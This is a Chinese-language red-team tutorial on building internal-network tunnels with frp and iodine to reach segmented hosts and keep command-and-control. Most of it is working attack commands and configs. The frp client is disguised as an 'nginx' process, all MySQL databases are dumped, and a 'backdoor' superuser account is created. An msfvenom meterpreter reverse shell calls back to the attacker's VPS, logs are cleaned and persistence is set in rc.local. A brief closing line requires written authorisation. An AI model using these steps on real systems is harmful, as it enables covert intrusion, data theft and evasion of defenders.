内网隧道突破：红队实战指南

内网隧道搭建：红队视角下的网络突破与横向渗透实战指南

因护网攻击队渗透需要，内网隧道搭建是突破多层网络隔离、实现持续控制的核心技术 —— 当我们拿下内网一台跳板机后，往往面临 “能控制单台主机，但无法访问内网其他网段”“目标无直接公网出口，C2 通信中断” 等困境，而内网隧道正是解决这类问题的 “网络桥梁”。本文将从概念本质、技术分类、实战案例、渗透思路四个维度，系统讲解内网隧道的应用，全程贯穿红队实战思维。

一、内网隧道的核心定义与价值

1. 什么是内网隧道？

内网隧道是指在受限制的网络环境中（如多层防火墙、端口封禁、网络隔离），通过封装、转发技术，建立一条 “隐蔽且可控” 的通信通道，实现 “跳板机与公网 C2”“跳板机与内网其他资产” 之间的流量传输。

其本质是 “流量伪装 + 协议转换”：将渗透测试所需的流量（如 SSH、RDP、C2 通信）封装到目标网络允许的协议（如 HTTP、DNS、ICMP）中，绕过防火墙规则与流量监控。

2. 红队为什么必须掌握内网隧道？

内网环境的典型限制场景，决定了隧道的不可替代性：

• 场景 1：内网无直接公网出口：跳板机仅能访问内网网段（如 192.168.1.0/24），无法主动连接公网 C2，需通过隧道反向回连；
• 场景 2：端口封禁：防火墙仅允许 80/443 端口出站，需将 SSH（22 端口）流量封装到 HTTP（80 端口）中传输；
• 场景 3：多层网络隔离：目标内网分为办公区（192.168.1.0/24）、服务器区（172.16.10.0/24），跳板机位于办公区，需通过隧道访问服务器区；
• 场景 4：流量监控：内网部署 IDS/IPS，直接传输 C2 流量会被拦截，需将流量伪装成正常业务流量（如模拟微信 API 请求）。

二、常见内网隧道技术分类与适用场景

不同隧道技术的核心差异在于 “封装协议”，红队需根据内网环境选择最优方案：

三、实战案例 1：基于 frp 的 TCP 隧道 —— 横向渗透内网数据库服务器

1. 环境拓扑与前置条件

• 公网 VPS：1.2.3.4（作为 frp 服务端，开放 7000 端口用于隧道控制，33060 端口用于转发数据库流量）；
• 内网跳板机：192.168.1.10（已拿下 root 权限，能访问内网数据库服务器 172.16.10.5，无直接公网出口，但可访问公网 VPS 的 7000 端口）；
• 目标资产：内网 MySQL 服务器 172.16.10.5（3306 端口开放，仅允许 192.168.1.0/24 网段访问）；
• 限制条件：内网防火墙仅允许跳板机访问公网的 7000 端口（其他端口封禁）。

2. 隧道搭建核心步骤（红队实战操作）

步骤 1：公网 VPS 部署 frp 服务端（frps）

1. 下载 frp（对应系统版本，此处为 Linux amd64）：

   wget https://github.com/fatedier/frp/releases/download/v0.51.3/frp_0.51.3_linux_amd64.tar.gz
   tar -zxvf frp_0.51.3_linux_amd64.tar.gz && cd frp_0.51.3_linux_amd64
   

2. 编写服务端配置文件frps.ini（核心是开放控制端口与转发端口）：

   [common]
   bind_port = 7000  # frp控制端口（与跳板机通信）
   token = RedTeam@2024  # 身份验证令牌（防止未授权连接）
   log_file = /var/log/frps.log  # 日志文件（便于排查问题）
   log_level = info  # 日志级别（避免日志过大）
   

3. 后台启动 frp 服务端：

   nohup ./frps -c frps.ini &  # 后台运行，断开SSH不停止
   

4. 验证服务端状态：

   netstat -tulnp | grep 7000  # 确认7000端口已监听
   

步骤 2：内网跳板机部署 frp 客户端（frpc）

1. 上传 frp 客户端（Linux arm64，适配跳板机架构）到/tmp目录，编写客户端配置文件frpc.ini：

   [common]
   server_addr = 1.2.3.4  # 公网VPS IP
   server_port = 7000  # 服务端控制端口
   token = RedTeam@2024  # 与服务端一致的令牌
   log_file = /tmp/frpc.log  # 日志文件（隐藏在/tmp，降低被发现概率）# 关键：将内网MySQL端口（172.16.10.5:3306）转发到公网VPS的33060端口
   [mysql_proxy]
   type = tcp  # 隧道类型（TCP）
   local_ip = 172.16.10.5  # 内网目标IP（MySQL服务器）
   local_port = 3306  # 内网目标端口（MySQL默认端口）
   remote_port = 33060  # 公网VPS转发端口（访问该端口即等于访问172.16.10.5:3306）
   

2. 后台启动 frp 客户端（隐藏进程，降低蓝队发现概率）：

   # 重命名frpc为“nginx”，伪装成Web服务进程
   mv frpc nginx
   # 后台运行，并重定向输出（避免日志暴露）
   nohup ./nginx -c frpc.ini > /dev/null 2>&1 &
   

3. 验证客户端连接：

   ps aux | grep nginx  # 确认伪装进程存在
   cat /tmp/frpc.log | grep "success"  # 查看是否连接成功
   

步骤 3：通过隧道横向渗透 MySQL 服务器

1. 在公网 VPS 上，通过转发端口连接内网 MySQL：

   # 格式：mysql -h 公网VPS IP -P 转发端口 -u 用户名 -p
   mysql -h 1.2.3.4 -P 33060 -u root -p
   

2. 输入 MySQL 密码（假设通过前期信息收集获取root/Admin@123），成功登录后：

   • 导出敏感数据：mysqldump -u root -p --all-databases > /tmp/inner_db.sql；
   • 植入后门：创建高权限账号create user 'backdoor'@'%' identified by 'Backdoor@2024'; grant all privileges on *.* to 'backdoor'@'%' with grant option;；
   • 横向移动：通过 MySQL 的xp_cmdshell（若开启）执行系统命令，或结合其他漏洞（如 UDF 提权）获取服务器 Shell。

3. 红队隐蔽性技巧

• 进程伪装：将 frpc 重命名为nginx/apache（常见服务进程名），避免被蓝队通过进程名识别；
• 端口伪装：若公网 VPS 有 Web 服务，可将 frp 控制端口改为 8080（伪装成 Web 服务端口）；
• 日志清理：定期删除/tmp/frpc.log，避免隧道运行痕迹被溯源；
• 流量控制：在frpc.ini中添加bandwidth_limit = 1MB，避免隧道流量过大触发告警。

四、实战案例 2：基于 iodine 的 DNS 隧道 —— 极端环境下的 C2 回连

1. 环境拓扑与前置条件

• 公网 VPS + 域名：1.2.3.4，已解析域名dns.redteam.com（A 记录指向 VPS，用于 DNS 隧道）；
• 内网跳板机：192.168.2.20（已拿下权限，仅允许 DNS 解析（53 端口），无其他公网出口，无法访问 VPS 的 7000/80 端口）；
• 限制条件：内网防火墙封禁所有 TCP/UDP 端口，仅允许 DNS 查询（53 端口），且禁止 ping 请求。

2. 隧道搭建核心步骤

步骤 1：公网 VPS 部署 iodine 服务端（dnsd）

1. 安装 iodine（Linux 系统）：

   apt-get install iodine  # Debian/Ubuntu
   # 或 yum install iodine  # CentOS
   

2. 生成预共享密钥（用于加密 DNS 隧道流量，防止被监听）：

   echo "RedTeamDNS@2024" > /etc/iodine/secret  # 密钥文件，客户端需一致
   

3. 启动 iodine 服务端（监听 53 端口，使用域名dns.redteam.com）：

   # 格式：iodined -f -c -s 服务端内网IP 域名 -P 密钥文件
   iodined -f -c -s 10.0.0.1 dns.redteam.com -P /etc/iodine/secret
   

   • -f：前台运行（便于调试，生产环境可加nohup后台运行）；
   • -c：禁用非加密模式（强制加密）；
   • -s 10.0.0.1：服务端在隧道中的虚拟 IP（后续客户端会获取该网段的 IP）。

步骤 2：内网跳板机部署 iodine 客户端（iodine）

1. 上传 iodine 客户端（适配跳板机架构），执行连接命令：

   # 格式：iodine -f -c -P 密钥 域名
   iodine -f -c -P "RedTeamDNS@2024" dns.redteam.com
   

2. 验证隧道连接：

   ifconfig  # 查看是否生成虚拟网卡tun0，IP应为10.0.0.2（与服务端10.0.0.1同网段）
   ping 10.0.0.1  # 测试隧道连通性（能ping通则成功）
   

步骤 3：通过 DNS 隧道建立 C2 通信

1. 在公网 VPS 上，通过虚拟网卡tun0连接跳板机：

   ssh root@10.0.0.2  # 直接通过隧道SSH登录跳板机
   

2. 部署 C2 客户端（如 Metasploit 的 meterpreter）：

   • 在 VPS 上生成 meterpreter payload：msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > backdoor.elf；
   • 通过 SSH 将backdoor.elf上传到跳板机/tmp目录；
   • 在 VPS 上启动监听：msfconsole -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 10.0.0.1; set LPORT 4444; run"；
   • 在跳板机上执行chmod +x /tmp/backdoor.elf && /tmp/backdoor.elf，成功建立 meterpreter 会话，实现持续控制。

3. 红队风险点与应对

• DNS 流量异常：大量 TXT 记录查询可能被蓝队监控，可在iodine中添加-r参数（使用 A 记录而非 TXT 记录，降低异常特征）；
• 速度限制：DNS 隧道速度极慢（通常 < 100KB/s），仅用于传输小体积 payload 或控制命令，避免传输大文件；
• 域名风险：使用临时注册的域名（避免关联红队真实身份），测试结束后立即注销。

五、内网隧道的进阶渗透思路

红队使用隧道的核心目标是 “扩大控制范围”，而非单纯建立通道，需结合以下思路深化渗透：

1. 多层隧道嵌套（突破复杂网络隔离）

若内网分为 “办公区→DMZ 区→核心区” 三层，可搭建嵌套隧道：

• 第一层：办公区跳板机（192.168.1.10）→ 公网 VPS（frp TCP 隧道）；

• 第二层：DMZ 区服务器（172.16.1.50，通过第一层隧道控制）→ 办公区跳板机（reGeorg HTTP 隧道，伪装成 Web 流量）；

• 第三层：核心区数据库（10.0.0.5）→ DMZ 区服务器（lcx 端口转发）；

  最终实现公网 VPS→核心区数据库的全链路访问。

2. 隧道与漏洞利用结合

• 通过隧道扫描内网：在公网 VPS 上，通过 frp 隧道转发 nmap 扫描流量，扫描内网 172.16.0.0/12 网段：

  nmap -sT -Pn -p 22,3389 -iL inner_ips.txt -oN inner_scan.txt --proxies http://127.0.0.1:8080
  

• 通过隧道利用漏洞：将 Exploit（如 Log4j 的 EXP）通过 DNS 隧道传输到跳板机，利用内网 Web 服务漏洞获取权限。

3. 隧道的持久化与容错

• 开机自启：在跳板机/etc/rc.local中添加 frpc 启动命令（/tmp/nginx -c /tmp/frpc.ini &），确保服务器重启后隧道自动恢复；
• 多隧道备份：同时搭建 frp（TCP）和 reGeorg（HTTP）隧道，若其中一条被拦截，可立即切换另一条。

六、总结与红队职业底线

内网隧道是红队突破网络隔离的 “手术刀”，其价值不在于 “炫技”，而在于 “精准解决问题”—— 根据内网环境选择最合适的隧道技术，结合隐蔽性技巧与渗透思路，才能实现 “悄无声息地扩大控制范围”。

但必须强调：所有隧道搭建与渗透操作，必须基于明确的书面授权，严禁用于任何未授权的网络攻击。护网红队的核心职责是 “模拟攻击以帮助企业提升防御能力”，而非破坏 —— 这是职业底线，更是法律红线。

掌握内网隧道技术，不仅要理解 “怎么搭”，更要思考 “为什么这么搭”“如何避免被发现”“如何为后续渗透铺路”—— 这才是护网红队与普通技术员的核心差距。